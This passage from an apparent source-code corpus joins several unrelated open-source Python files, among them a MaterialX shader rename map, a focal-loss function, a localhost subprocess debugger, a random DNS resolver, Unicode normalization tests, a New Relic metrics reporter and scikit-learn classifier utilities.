"MaterialX/mx_clamp_vector2" : "MaterialX/mx_clamp_vector2_vector2",
"MaterialX/mx_clamp_vector4" : "MaterialX/mx_clamp_vector4_vector4",
"MaterialX/mx_contrast_color" : "MaterialX/mx_contrast_color_color",
"MaterialX/mx_contrast_color2" : "MaterialX/mx_contrast_color2_color2",
"MaterialX/mx_contrast_color4" : "MaterialX/mx_contrast_color4_color4",
"MaterialX/mx_contrast_float" : "MaterialX/mx_contrast_float_float",
"MaterialX/mx_contrast_vector" : "MaterialX/mx_contrast_vector_vector",
"MaterialX/mx_contrast_vector2" : "MaterialX/mx_contrast_vector2_vector2",
"MaterialX/mx_contrast_vector4" : "MaterialX/mx_contrast_vector4_vector4",
"MaterialX/mx_divide_color" : "MaterialX/mx_divide_color_color",
"MaterialX/mx_divide_color2" : "MaterialX/mx_divide_color2_color2",
"MaterialX/mx_divide_color4" : "MaterialX/mx_divide_color4_color4",
"MaterialX/mx_divide_float" : "MaterialX/mx_divide_float_float",
"MaterialX/mx_divide_vector" : "MaterialX/mx_divide_vector_vector",
"MaterialX/mx_divide_vector2" : "MaterialX/mx_divide_vector2_vector2",
"MaterialX/mx_divide_vector4" : "MaterialX/mx_divide_vector4_vector4",
"MaterialX/mx_invert_color" : "MaterialX/mx_invert_color_color",
"MaterialX/mx_invert_color2" : "MaterialX/mx_invert_color2_color2",
"MaterialX/mx_invert_color4" : "MaterialX/mx_invert_color4_color4",
"MaterialX/mx_invert_float" : "MaterialX/mx_invert_float_float",
"MaterialX/mx_invert_vector" : "MaterialX/mx_invert_vector_vector",
"MaterialX/mx_invert_vector2" : "MaterialX/mx_invert_vector2_vector2",
"MaterialX/mx_invert_vector4" : "MaterialX/mx_invert_vector4_vector4",
"MaterialX/mx_max_color" : "MaterialX/mx_max_color_color",
"MaterialX/mx_max_color2" : "MaterialX/mx_max_color2_color2",
"MaterialX/mx_max_color4" : "MaterialX/mx_max_color4_color4",
"MaterialX/mx_max_float" : "MaterialX/mx_max_float_float",
"MaterialX/mx_max_vector" : "MaterialX/mx_max_vector_vector",
"MaterialX/mx_max_vector2" : "MaterialX/mx_max_vector2_vector2",
"MaterialX/mx_max_vector4" : "MaterialX/mx_max_vector4_vector4",
"MaterialX/mx_min_color" : "MaterialX/mx_min_color_color",
"MaterialX/mx_min_color2" : "MaterialX/mx_min_color2_color2",
"MaterialX/mx_min_color4" : "MaterialX/mx_min_color4_color4",
"MaterialX/mx_min_float" : "MaterialX/mx_min_float_float",
"MaterialX/mx_min_vector" : "MaterialX/mx_min_vector_vector",
"MaterialX/mx_min_vector2" : "MaterialX/mx_min_vector2_vector2",
"MaterialX/mx_min_vector4" : "MaterialX/mx_min_vector4_vector4",
"MaterialX/mx_modulo_color" : "MaterialX/mx_modulo_color_color",
"MaterialX/mx_modulo_color2" : "MaterialX/mx_modulo_color2_color2",
"MaterialX/mx_modulo_color4" : "MaterialX/mx_modulo_color4_color4",
"MaterialX/mx_modulo_float" : "MaterialX/mx_modulo_float_float",
"MaterialX/mx_modulo_vector" : "MaterialX/mx_modulo_vector_vector",
"MaterialX/mx_modulo_vector2" : "MaterialX/mx_modulo_vector2_vector2",
"MaterialX/mx_modulo_vector4" : "MaterialX/mx_modulo_vector4_vector4",
"MaterialX/mx_multiply_color" : "MaterialX/mx_multiply_color_color",
"MaterialX/mx_multiply_color2" : "MaterialX/mx_multiply_color2_color2",
"MaterialX/mx_multiply_color4" : "MaterialX/mx_multiply_color4_color4",
"MaterialX/mx_multiply_float" : "MaterialX/mx_multiply_float_float",
"MaterialX/mx_multiply_vector" : "MaterialX/mx_multiply_vector_vector",
"MaterialX/mx_multiply_vector2" : "MaterialX/mx_multiply_vector2_vector2",
"MaterialX/mx_multiply_vector4" : "MaterialX/mx_multiply_vector4_vector4",
"MaterialX/mx_remap_color" : "MaterialX/mx_remap_color_color",
"MaterialX/mx_remap_color2" : "MaterialX/mx_remap_color2_color2",
"MaterialX/mx_remap_color4" : "MaterialX/mx_remap_color4_color4",
"MaterialX/mx_remap_float" : "MaterialX/mx_remap_float_float",
"MaterialX/mx_remap_vector" : "MaterialX/mx_remap_vector_vector",
"MaterialX/mx_remap_vector2" : "MaterialX/mx_remap_vector2_vector2",
"MaterialX/mx_remap_vector4" : "MaterialX/mx_remap_vector4_vector4",
"MaterialX/mx_smoothstep_color" : "MaterialX/mx_smoothstep_color_color",
"MaterialX/mx_smoothstep_color2" : "MaterialX/mx_smoothstep_color2_color2",
"MaterialX/mx_smoothstep_color4" : "MaterialX/mx_smoothstep_color4_color4",
"MaterialX/mx_smoothstep_float" : "MaterialX/mx_smoothstep_float_float",
"MaterialX/mx_smoothstep_vector" : "MaterialX/mx_smoothstep_vector_vector",
"MaterialX/mx_smoothstep_vector2" : "MaterialX/mx_smoothstep_vector2_vector2",
"MaterialX/mx_smoothstep_vector4" : "MaterialX/mx_smoothstep_vector4_vector4",
"MaterialX/mx_subtract_color" : "MaterialX/mx_subtract_color_color",
"MaterialX/mx_subtract_color2" : "MaterialX/mx_subtract_color2_color2",
"MaterialX/mx_subtract_color4" : "MaterialX/mx_subtract_color4_color4",
"MaterialX/mx_subtract_float" : "MaterialX/mx_subtract_float_float",
"MaterialX/mx_subtract_vector" : "MaterialX/mx_subtract_vector_vector",
"MaterialX/mx_subtract_vector2" : "MaterialX/mx_subtract_vector2_vector2",
"MaterialX/mx_subtract_vector4" : "MaterialX/mx_subtract_vector4_vector4",
}
def __loadShaderWrapper( originalLoadShader ) :
def loadRenamedShader( self, shaderName, **kwargs ) :
renamed = __nameMapping.get( shaderName, shaderName )
return originalLoadShader( self, renamed, **kwargs )
return loadRenamedShader
GafferOSL.OSLShader.loadShader = __loadShaderWrapper( GafferOSL.OSLShader.loadShader )
|
maskrcnn_benchmark/layers/focal_loss.py | sergiev/ContourNet | 211 | 12686114 |
import torch
from torch import nn
from torch.nn import functional as F
def Focal_Loss(pred, gt):
# print('yes!!')
ce = nn.CrossEntropyLoss()
alpha = 0.25
gamma = 2
# logp = ce(input, target)
p = torch.sigmoid(pred)
loss = -alpha * (1 - p) ** gamma * (gt * torch.log(p)) - \
(1 - alpha) * p ** gamma * ((1 - gt) * torch.log(1 - p))
return loss.mean()
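# Illustrative usage sketch (hypothetical tensors, not from the original repo):
#   pred = torch.randn(4, 1, 64, 64)                   # raw logits
#   gt = torch.randint(0, 2, (4, 1, 64, 64)).float()   # binary targets
#   loss = Focal_Loss(pred, gt)                        # scalar tensor
# Note that pred is passed through torch.sigmoid() inside the function, so it
# should be raw logits rather than probabilities.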
# pred =torch.sigmoid(pred)
# pos_inds = gt.eq(1).float()
# neg_inds = gt.lt(1).float()
#
# loss = 0
#
# pos_loss = torch.log(pred + 1e-10) * torch.pow(pred, 2) * pos_inds
# # neg_loss = torch.log(1 - pred) * torch.pow(pred, 2) * neg_weights * neg_inds
# neg_loss = torch.log(1 - pred) * torch.pow(1 - pred, 2) * neg_inds
#
# num_pos = pos_inds.float().sum()
# num_neg = neg_inds.float().sum()
#
# pos_loss = pos_loss.sum()
# neg_loss = neg_loss.sum()
#
# if num_pos == 0:
# loss = loss - neg_loss
# else:
# # loss = loss - (pos_loss + neg_loss) / (num_pos)
# loss = loss - (pos_loss + neg_loss )
# return loss * 5
# if weight is not None and weight.sum() > 0:
# return (losses * weight).sum() / weight.sum()
# else:
# assert losses.numel() != 0
# return losses.mean()
|
run_dir/subprocessdebugger.py | classerase/polygott | 370 | 12686124 |
import os
import json
import select
import socket
import subprocess
import sys
import tempfile
import remotedebugger
if sys.version_info[0] == 2:
raise ValueError("Wrong Python version! This script is for Python 3.")
class DebuggerSocket():
def __init__(self, socket):
self.socket = socket
self.buffer = b''
def fileno(self):
return self.socket.fileno()
def parse_message(self):
if b'\n' in self.buffer:
data, self.buffer = self.buffer.split(b'\n', 1)
msg = json.loads(data.decode('utf8'))
return msg
def on_read(self):
"""Reads bytes off the wire and returns all contained messages"""
data = self.socket.recv(1024)
if not data:
raise subprocess.SubprocessError('Subprocess disconnected')
self.buffer += data
msgs = []
while True:
msg = self.parse_message()
if msg:
msgs.append(msg)
else:
break
return msgs
class DebuggerProcess(object):
def __init__(self, program):
self.temp_dir = tempfile.TemporaryDirectory()
self.filename = os.path.join(self.temp_dir.name, 'usermodule.py')
with open(self.filename, 'w') as f:
f.write(program)
host, port = ('127.0.0.1', 1234)
listen_socket = socket.socket()
listen_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, True)
listen_socket.bind((host, port))
listen_socket.listen(1)
self.p = subprocess.Popen([
sys.executable,
os.path.abspath(remotedebugger.__file__),
'--host', host,
'--port', str(port),
'--connect',
'--file',
self.filename,
],
stdin=subprocess.PIPE,
# use real stdout/stderr for printing errors
)
self.messages = []
self.done = False
self.s, _ = listen_socket.accept()
listen_socket.close()
self.debuggerSocket = DebuggerSocket(self.s)
self.has_already_stepped_once = False
def send(self, kind):
msg = json.dumps({'kind': kind}).encode('utf8')+b'\n'
self.s.sendall(msg)
def step(self):
"""Yields messages until current stack is returned.
Yielded messages will be of one of these types
* {kind: 'stdout', data: 'data'} when the process writes to stdout
* (kind: 'stderr', data: 'data') when the process writes to stderr
* (kind: 'error', data: 'Traceback ...'}
The first step does not step, it just returns the first stack.
"""
if self.done:
return 'done'
elif self.has_already_stepped_once:
self.send('step')
else:
self.has_already_stepped_once = True
yield from self.update_stack()
return 'done' if self.done else self.stack
def update_stack(self):
stack_or_done = yield from self._get_stack()
if stack_or_done == 'done':
self.done = True
self.stack = []
else:
self.stack = stack_or_done
def _get_stack(self):
"""Returns a list of stack frame {lineno, functionName}, or 'done'"""
for kind, payload in self.get_subproc_msgs('stack'):
if kind == 'stack':
stack = payload
elif kind == 'stdout':
yield (kind, payload)
elif kind == 'stderr':
yield (kind, payload)
elif kind == 'done':
return 'done'
elif kind == 'error':
yield ('error', payload)
return 'done'
else:
raise ValueError("Unexpected message: "+repr((kind, payload)))
return stack
def get_subproc_msgs(self, kind='stack'):
"""Yields subprocess messages until the requested message is received.
This method also forwards stdin bytes to the debugger subprocess,
so it's important to use it instead of a (blocking) self.s.recv()
"""
readers = [self.debuggerSocket, sys.stdin]
while True:
rs, _, _ = select.select(readers, [], [])
for reader in rs:
if reader is sys.stdin:
self.p.stdin.write(bytearray(reader.readline(), 'utf-8'))
elif reader is self.debuggerSocket:
msgs = self.debuggerSocket.on_read()
for msg in msgs:
yield (msg['kind'], msg['data'])
if msg['kind'] == kind:
return
def cleanup(self):
self.s.close()
self.p.stdin.close()
self.p.kill()
self.temp_dir.cleanup()
def __enter__(self):
return self
def __exit__(self, *args):
self.cleanup()
def __del__(self):
self.cleanup()
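# Usage sketch (hypothetical program string): DebuggerProcess is a context
# manager whose step() method is a generator that streams stdout/stderr/error
# messages and finally returns either the current stack or 'done', so a caller
# typically drives it with `yield from` inside its own generator, e.g.
#   with DebuggerProcess("print('hi')\n") as dbg:
#       outcome = yield from dbg.step()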
|
lib/carbon/resolver.py | hessu/carbon | 961 | 12686148 |
import random
from zope.interface import implementer
from twisted.internet._resolver import GAIResolver
from twisted.internet.defer import Deferred
from twisted.internet.address import IPv4Address
from twisted.internet.interfaces import IResolverSimple, IResolutionReceiver
from twisted.internet.error import DNSLookupError
# Inspired from /twisted/internet/_resolver.py
@implementer(IResolutionReceiver)
class RandomWins(object):
"""
An L{IResolutionReceiver} which fires a L{Deferred} with a random result.
"""
def __init__(self, deferred):
"""
@param deferred: The L{Deferred} to fire when one resolution
result arrives.
"""
self._deferred = deferred
self._results = []
def resolutionBegan(self, resolution):
"""
See L{IResolutionReceiver.resolutionBegan}
@param resolution: See L{IResolutionReceiver.resolutionBegan}
"""
self._resolution = resolution
def addressResolved(self, address):
"""
See L{IResolutionReceiver.addressResolved}
@param address: See L{IResolutionReceiver.addressResolved}
"""
self._results.append(address.host)
def resolutionComplete(self):
"""
See L{IResolutionReceiver.resolutionComplete}
"""
if self._results:
random.shuffle(self._results)
self._deferred.callback(self._results[0])
else:
self._deferred.errback(DNSLookupError(self._resolution.name))
@implementer(IResolverSimple)
class ComplexResolverSimplifier(object):
"""
A converter from L{IHostnameResolver} to L{IResolverSimple}
"""
def __init__(self, nameResolver):
"""
Create a L{ComplexResolverSimplifier} with an L{IHostnameResolver}.
@param nameResolver: The L{IHostnameResolver} to use.
"""
self._nameResolver = nameResolver
def getHostByName(self, name, timeouts=()):
"""
See L{IResolverSimple.getHostByName}
@param name: see L{IResolverSimple.getHostByName}
@param timeouts: see L{IResolverSimple.getHostByName}
@return: see L{IResolverSimple.getHostByName}
"""
result = Deferred()
self._nameResolver.resolveHostName(RandomWins(result), name, 0,
[IPv4Address])
return result
def setUpRandomResolver(reactor):
resolver = GAIResolver(reactor, reactor.getThreadPool)
reactor.installResolver(ComplexResolverSimplifier(resolver))
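# Usage note (a sketch): calling setUpRandomResolver(reactor) during service
# startup replaces the reactor's simple resolver, so each getHostByName()
# lookup returns one of the resolved IPv4 addresses chosen at random rather
# than always the first one.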
|
pypy/module/unicodedata/test/test_hyp.py | nanjekyejoannah/pypy | 333 | 12686226 |
import sys
import pytest
try:
from hypothesis import given, strategies as st, example, settings, assume
except ImportError:
pytest.skip("hypothesis required")
from pypy.module.unicodedata.interp_ucd import ucd
from rpython.rlib.rutf8 import codepoints_in_utf8
def make_normalization(space, NF_code):
def normalize(s):
u = s.encode('utf8')
w_s = space.newutf8(u, codepoints_in_utf8(u))
w_res = ucd.normalize(space, NF_code, w_s)
return space.utf8_w(w_res).decode('utf8')
return normalize
all_forms = ['NFC', 'NFD', 'NFKC', 'NFKD']
# For every (n1, n2, n3) triple, applying n1 then n2 must be the same
# as applying n3.
# Reference: http://unicode.org/reports/tr15/#Design_Goals
compositions = [
('NFC', 'NFC', 'NFC'),
('NFC', 'NFD', 'NFD'),
('NFC', 'NFKC', 'NFKC'),
('NFC', 'NFKD', 'NFKD'),
('NFD', 'NFC', 'NFC'),
('NFD', 'NFD', 'NFD'),
('NFD', 'NFKC', 'NFKC'),
('NFD', 'NFKD', 'NFKD'),
('NFKC', 'NFC', 'NFKC'),
('NFKC', 'NFD', 'NFKD'),
('NFKC', 'NFKC', 'NFKC'),
('NFKC', 'NFKD', 'NFKD'),
('NFKD', 'NFC', 'NFKC'),
('NFKD', 'NFD', 'NFKD'),
('NFKD', 'NFKC', 'NFKC'),
('NFKD', 'NFKD', 'NFKD'),
]
@pytest.mark.parametrize('NF1, NF2, NF3', compositions)
@example(s=u'---\uafb8\u11a7---') # issue 2289
@settings(max_examples=1000)
@given(s=st.text())
def test_composition(s, space, NF1, NF2, NF3):
# chr(0xfacf) normalizes to chr(0x2284a), which is too big
assume(not (s == u'\ufacf' and sys.maxunicode == 65535))
norm1, norm2, norm3 = [make_normalization(space, form) for form in [NF1, NF2, NF3]]
assert norm2(norm1(s)) == norm3(s)
if sys.maxunicode != 65535:
# conditionally generate the example via an unwrapped decorator
test_composition = example(s=u'\ufacf')(test_composition)
|
src/models/sequence/rnns/__init__.py | dumpmemory/state-spaces | 513 | 12686249 | # Expose the cell registry and load all possible cells
from .cells.basic import CellBase
from .cells import basic
from .cells import hippo
from .cells import timestamp
from . import sru
|
test/sanity/issue4493-win-open-size/test.py | frank-dspeed/nw.js | 27,296 | 12686263 |
import time
import os
import platform
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
chrome_options = Options()
chrome_options.add_argument("nwapp=" + os.path.dirname(os.path.abspath(__file__)))
# open first time
print 'Open first time'
driver = webdriver.Chrome(executable_path=os.environ['CHROMEDRIVER'], chrome_options=chrome_options)
driver.implicitly_wait(10)
try:
print driver.current_url
size = driver.find_element_by_id('size').get_attribute('innerHTML')
print 'open size %s' % size
driver.find_element_by_id('resize-window').click()
size = driver.find_element_by_id('resize').get_attribute('innerHTML')
print 'resize to %s' % size
finally:
driver.quit()
# open second time
print 'Open second time'
driver = webdriver.Chrome(executable_path=os.environ['CHROMEDRIVER'], chrome_options=chrome_options)
driver.implicitly_wait(10)
try:
print driver.current_url
size = driver.find_element_by_id('size').get_attribute('innerHTML')
print 'open size %s' % size
assert(size == '666x333' or size == '667x334')
finally:
driver.quit()
|
pyformance/reporters/newrelic_reporter.py | boarik/pyformance | 167 | 12686279 | # -*- coding: utf-8 -*-
from __future__ import print_function
import json
import os
import socket
import sys
from pyformance.registry import set_global_registry, MetricsRegistry
if sys.version_info[0] > 2:
import urllib.request as urllib
import urllib.error as urlerror
else:
import urllib2 as urllib
import urllib2 as urlerror
from pyformance.__version__ import __version__
from .reporter import Reporter
DEFAULT_CARBON_SERVER = "0.0.0.0"
DEFAULT_CARBON_PORT = 2003
class NewRelicSink(object):
def __init__(self):
self.total = 0
self.count = 0
self.min = None
self.max = None
self.sum_of_squares = 0
def add(self, seconds):
self.total += seconds
self.count += 1
self.sum_of_squares += seconds * seconds
self.min = min(self.min, seconds) if self.min else seconds
self.max = max(self.max, seconds) if self.max else seconds
pass
class NewRelicRegistry(MetricsRegistry):
def create_sink(self):
return NewRelicSink()
set_global_registry(NewRelicRegistry())
class NewRelicReporter(Reporter):
"""
Reporter for new relic
"""
MAX_METRICS_PER_REQUEST = 10000
PLATFORM_URL = "https://platform-api.newrelic.com/platform/v1/metrics"
def __init__(
self,
license_key,
registry=None,
name=socket.gethostname(),
reporting_interval=5,
prefix="",
clock=None,
):
super(NewRelicReporter, self).__init__(registry, reporting_interval, clock)
self.name = name
self.prefix = prefix
self.http_headers = {
"Accept": "application/json",
"Content-Type": "application/json",
"X-License-Key": license_key,
}
def report_now(self, registry=None, timestamp=None):
metrics = self.collect_metrics(registry or self.registry)
if metrics:
try:
# XXX: better use http-keepalive/pipelining somehow?
request = urllib.Request(
self.PLATFORM_URL,
metrics.encode() if sys.version_info[0] > 2 else metrics,
)
for k, v in self.http_headers.items():
request.add_header(k, v)
result = urllib.urlopen(request)
if isinstance(result, urlerror.HTTPError):
raise result
except Exception as e:
print(e, file=sys.stderr)
@property
def agent_data(self):
"""Return the agent data section of the NewRelic Platform data payload
:rtype: dict
"""
return {
"host": socket.gethostname(),
"pid": os.getpid(),
"version": __version__,
}
def create_metrics(self, registry):
results = {}
# noinspection PyProtectedMember
timers = registry._timers
for key in timers:
sink = timers[key].sink
if not sink.count:
continue
full_key = "Component/%s%s" % (self.prefix, key)
results[full_key.replace(".", "/")] = {
"total": sink.total,
"count": sink.count,
"min": sink.min,
"max": sink.max,
"sum_of_squares": sink.sum_of_squares,
}
sink.__init__()
return results
def collect_metrics(self, registry):
body = {
"agent": self.agent_data,
"components": [
{
"guid": "com.github.pyformance",
"name": self.name,
"duration": self.reporting_interval,
"metrics": self.create_metrics(registry),
}
],
}
return json.dumps(body, ensure_ascii=False, sort_keys=True)
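# Rough usage sketch (hypothetical license key and metric name; assumes the
# module-level timer() helper exported by pyformance):
#   import pyformance
#   reporter = NewRelicReporter("YOUR_LICENSE_KEY", prefix="myapp/")
#   reporter.start()
#   with pyformance.timer("db.query").time():
#       ...  # importing this module installs NewRelicRegistry globally, so
#            # timers aggregate into the NewRelicSink defined above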
|
osquery/plugin.py | eoinmiller-r7/osquery-python | 274 | 12686282 |
"""This source code is licensed under the BSD-style license found in the
LICENSE file in the root directory of this source tree. An additional grant
of patent rights can be found in the PATENTS file in the same directory.
"""
# pylint: disable=no-self-use
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from abc import ABCMeta, abstractmethod
from future.utils import with_metaclass
from osquery.singleton import Singleton
class BasePlugin(with_metaclass(ABCMeta, Singleton)):
"""All osquery plugins should inherit from BasePlugin"""
@abstractmethod
def call(self, context):
"""Call is the method that is responsible for routing a thrift request
to the appropriate class method.
This must be implemented by the plugin type (ie: LoggerPlugin), but
explicitly not an end-user plugin type (ie: MyAwesomeLoggerPlugin)
call should return an ExtensionResponse, as defined in osquery.thrift
"""
raise NotImplementedError
@abstractmethod
def name(self):
"""The name of your plugin.
This must be implemented by your plugin.
"""
raise NotImplementedError
def routes(self):
"""The routes that should be broadcasted by your plugin"""
return []
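# Minimal illustrative subclass (a sketch, not part of osquery-python itself):
#   class ExampleLoggerPlugin(BasePlugin):
#       def name(self):
#           return "example_logger"
#       def call(self, context):
#           # a concrete plugin type would build an ExtensionResponse here
#           ...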
|
constrained_language_typology/scikit_classifier.py | deepneuralmachine/google-research | 23,901 | 12686290 | # coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Simple sckit-learn classification utilities."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import math
import pickle
from absl import flags
from absl import logging
import numpy as np
from sklearn import model_selection
from sklearn.compose import make_column_transformer
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis
from sklearn.discriminant_analysis import QuadraticDiscriminantAnalysis
from sklearn.ensemble import AdaBoostClassifier
from sklearn.ensemble import BaggingClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.gaussian_process import GaussianProcessClassifier
from sklearn.linear_model import LogisticRegression
from sklearn.linear_model import RidgeClassifier
from sklearn.model_selection import RepeatedStratifiedKFold
from sklearn.naive_bayes import GaussianNB
from sklearn.neural_network import MLPClassifier
from sklearn.preprocessing import OneHotEncoder
from sklearn.preprocessing import StandardScaler
from sklearn.svm import LinearSVC
from sklearn.tree import DecisionTreeClassifier
# pylint: disable=invalid-name
flags.DEFINE_boolean(
"transform_inputs", True,
"If enabled, will scale the numeric features and convert categorical "
"features to one-hot encoding.")
flags.DEFINE_list(
"classifiers", ["LogisticRegression"],
"Type of the classifier. One of: \"LogisticRegression\", \"SVM\", "
"\"RidgeRegression\", \"RandomForest\", \"AdaBoost\", \"LDA\", \"QDA\", "
"\"GaussianProcess\", \"DecisionTree\", \"DNN\", \"GaussianNaiveBayes\", "
"\"BaggingEnsemble\".")
flags.DEFINE_boolean(
"use_implicationals", True, "If True, use the implicational features.")
flags.DEFINE_string(
"best_configurations_file", "",
"File containing the JSON dictionary from feature names to the "
"respective best model and data configurations. When `--cross_validate` "
"is enabled, this is the output file to be generated. In all other modes "
"this is an input file.")
FLAGS = flags.FLAGS
# List of all supported classifiers.
ALL_MODELS = [
"AdaBoost", "DNN", "DecisionTree", "GaussianProcess", "LDA",
"LogisticRegression", "QDA", "RandomForest", "RidgeRegression", "SVM",
"GaussianNaiveBayes", "BaggingEnsemble"
]
# Model information keys.
MODEL_INFO_NAME_KEY = "name"
MODEL_INFO_SPARSITY_KEY = "no_cv" # Not enough data.
MODEL_INFO_SCORE_KEY = "accuracy"
MODEL_INFO_CANDIDATES_KEY = "candidates"
# Random seed.
_RANDOM_STATE = 4611170
# WALS language code.
_LANGUAGE_CODE = "wals_code"
def _prepare_data(input_df):
"""Splits data into features and labels."""
class_label = "target_value"
y = input_df[class_label].copy()
X_columns_to_drop = [class_label, _LANGUAGE_CODE, "target_feature"]
X = input_df.drop(columns=X_columns_to_drop)
return X, y
def _split_into_features_and_labels(feature_name, feature_maker,
training_df, dev_df,
transform_inputs):
"""Preprocesses the data and returns the features and labels."""
# Get the label class counts for the training data.
train_class_counts = training_df.target_value.value_counts()
train_class_counts = list(zip(train_class_counts.index,
train_class_counts.values))
logging.info("%s: Class counts: %s", feature_name, train_class_counts)
# Perform the split into features and labels of the training set.
X_train, y_train = _prepare_data(training_df)
logging.info("%s: Input feature dimensions: %s", feature_name,
X_train.shape[1])
# Split dev set.
X_dev, y_dev = _prepare_data(dev_df)
# Numeric columns are transformed using standard scaler and categorical
# columns are converted to one-hot.
if transform_inputs:
numeric_cols = ["latitude", "longitude"]
categorical_cols = []
for col_name in X_train.columns:
if (col_name in feature_maker.prob_features or
col_name in feature_maker.count_features):
numeric_cols.append(col_name) # Counts, probabilities.
elif col_name in feature_maker.categorical_features:
categorical_cols.append(col_name) # Categorical feature values.
inputs_transformer = make_column_transformer(
(StandardScaler(), numeric_cols),
(OneHotEncoder(handle_unknown="ignore"), categorical_cols),
remainder="passthrough")
X_train = inputs_transformer.fit_transform(X_train)
if X_dev.shape[0]: # Do we have enough samples?
X_dev = inputs_transformer.transform(X_dev)
else:
logging.warning("Feature %s not found in the dev set. This is likely to "
"crash the evaluation mode!", feature_name)
else:
# Transform data frames to Numpy. The input transformer in the branch above
# returns Numpy arrays.
X_train = X_train.to_numpy()
X_dev = X_dev.to_numpy()
return (
X_train, y_train.to_numpy(), X_dev, y_dev.to_numpy(), train_class_counts)
def prepare_data(feature_maker, feature_name, use_implicationals=True,
prediction_mode=False):
"""Prepares the features and labels for the given WALS feature name."""
# Process training and dev data for the feature. Store the WALS language codes
# for the development set aside.
training_df, dev_df = feature_maker.process_data(
feature_name, prediction_mode=prediction_mode)
assert _LANGUAGE_CODE in dev_df.columns
dev_language_codes = list(dev_df[_LANGUAGE_CODE].values)
if not use_implicationals:
logging.info("Discarding implicational features")
training_df = feature_maker.select_columns(training_df,
discard_implicationals=True)
dev_df = feature_maker.select_columns(dev_df,
discard_implicationals=True)
# Split the data into features and labels.
X_train, y_train, X_dev, y_dev, train_class_counts = (
_split_into_features_and_labels(
feature_name, feature_maker, training_df, dev_df,
FLAGS.transform_inputs))
return X_train, y_train, X_dev, y_dev, dev_language_codes, train_class_counts
def _make_classifier(classifier_name):
"""Classifier factory."""
# Class weights: if you set this to None, you'd get much better accuracies,
# but it's likely that the classifier will be overpredicting the majority
# class.
class_weight_strategy = None # Note: this may set "balanced" as default.
max_iters = 10000
if classifier_name == "AdaBoost":
model = AdaBoostClassifier(n_estimators=100)
elif classifier_name == "LogisticRegression":
model = LogisticRegression(max_iter=max_iters,
class_weight=class_weight_strategy)
elif classifier_name == "LDA":
model = LinearDiscriminantAnalysis(tol=1E-6)
elif classifier_name == "QDA":
model = QuadraticDiscriminantAnalysis()
elif classifier_name == "DNN":
model = MLPClassifier(random_state=_RANDOM_STATE,
hidden_layer_sizes=[200])
elif classifier_name == "DecisionTree":
model = DecisionTreeClassifier(random_state=_RANDOM_STATE,
min_samples_leaf=3,
criterion="entropy",
class_weight="balanced")
elif classifier_name == "GaussianProcess":
model = GaussianProcessClassifier(random_state=_RANDOM_STATE,
max_iter_predict=200)
elif classifier_name == "RandomForest":
model = RandomForestClassifier(n_estimators=200,
random_state=_RANDOM_STATE,
min_samples_leaf=3,
criterion="entropy",
class_weight="balanced_subsample")
elif classifier_name == "RidgeRegression":
model = RidgeClassifier(normalize=True, tol=1E-5,
class_weight=class_weight_strategy)
elif classifier_name == "SVM":
model = LinearSVC(max_iter=max_iters, class_weight=class_weight_strategy)
elif classifier_name == "GaussianNaiveBayes":
model = GaussianNB()
elif classifier_name == "BaggingEnsemble":
model = BaggingClassifier(random_state=_RANDOM_STATE)
else:
raise ValueError("Unsupported classifier: %s" % classifier_name)
return model
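# The factory can also be exercised on its own against a synthetic dataset
# (sketch only; make_classification is used purely for illustration and is not
# imported by this module):
#
#   from sklearn.datasets import make_classification
#   X_toy, y_toy = make_classification(n_samples=60, n_features=4,
#                                      random_state=_RANDOM_STATE)
#   clf = _make_classifier("RandomForest")
#   clf.fit(X_toy, y_toy)
#   print(clf.score(X_toy, y_toy))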
def cross_validate(feature_name, classifier_name, X, y,
cv_num_folds, cv_num_repeats):
"""Runs repeated stratified $k$-fold cross-validation.
Returns multiple cross-validation metrics as a dictionary, where for each
metric mean and variance across multiple repeats and folds is summarized.
Args:
feature_name: (string) Name of the WALS feature.
classifier_name: (string) Classifier name.
X: (numpy array) Input features.
y: (numpy array) Labels.
cv_num_folds: (int) Number of folds ($k$).
cv_num_repeats: (int) Number of repetitions.
Returns:
Dictionary containing cross-validation scores and stats.
"""
model = _make_classifier(classifier_name)
scoring = ["f1_micro", "precision_micro", "recall_micro", "accuracy"]
try:
# Really primitive logic to figure out class distribution.
_, y_counts = np.unique(y, return_counts=True)
y_max_freq = np.max(y_counts)
# Check if the class counts are not reliable to run cross-validation.
if y_max_freq < cv_num_folds:
logging.warning("[%s] %s: Not enough data. Fitting the model instead "
"of running CV", feature_name, classifier_name)
# Simply fit the model.
model.fit(X, y)
cv_scores = {}
cv_scores["accuracy"] = (model.score(X, y), 0.0)
cv_scores[MODEL_INFO_SPARSITY_KEY] = True
return cv_scores
else:
logging.info("[%s] Running cross-validation of %s (k=%d, n=%d) ...",
feature_name, classifier_name, cv_num_folds, cv_num_repeats)
# Run cross-validation.
cv = RepeatedStratifiedKFold(n_splits=cv_num_folds,
n_repeats=cv_num_repeats,
random_state=_RANDOM_STATE)
cv_scores = model_selection.cross_validate(
model, X, y, cv=cv, scoring=scoring, n_jobs=cv_num_folds)
cv_scores[MODEL_INFO_SPARSITY_KEY] = False
except Exception as e: # pylint: disable=broad-except
logging.error("[%s] %s: CV: Exception: %s", feature_name, classifier_name,
e)
return None
del cv_scores["fit_time"]
del cv_scores["score_time"]
for score_name in scoring:
scores_vec_key = "test_" + score_name
cv_scores[score_name] = (np.mean(cv_scores[scores_vec_key]),
np.var(cv_scores[scores_vec_key]))
del cv_scores[scores_vec_key]
# Sanity check.
if math.isnan(cv_scores["accuracy"][0]):
return None
logging.info("[train] %s: CV scores for %s: %s", feature_name,
classifier_name, cv_scores)
return cv_scores
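# Sketch of a direct call, with X_train / y_train as produced by prepare_data
# and "81A" standing in for any WALS feature ID:
#
#   scores = cross_validate("81A", "LogisticRegression", X_train, y_train,
#                           cv_num_folds=5, cv_num_repeats=2)
#   if scores is not None and not scores[MODEL_INFO_SPARSITY_KEY]:
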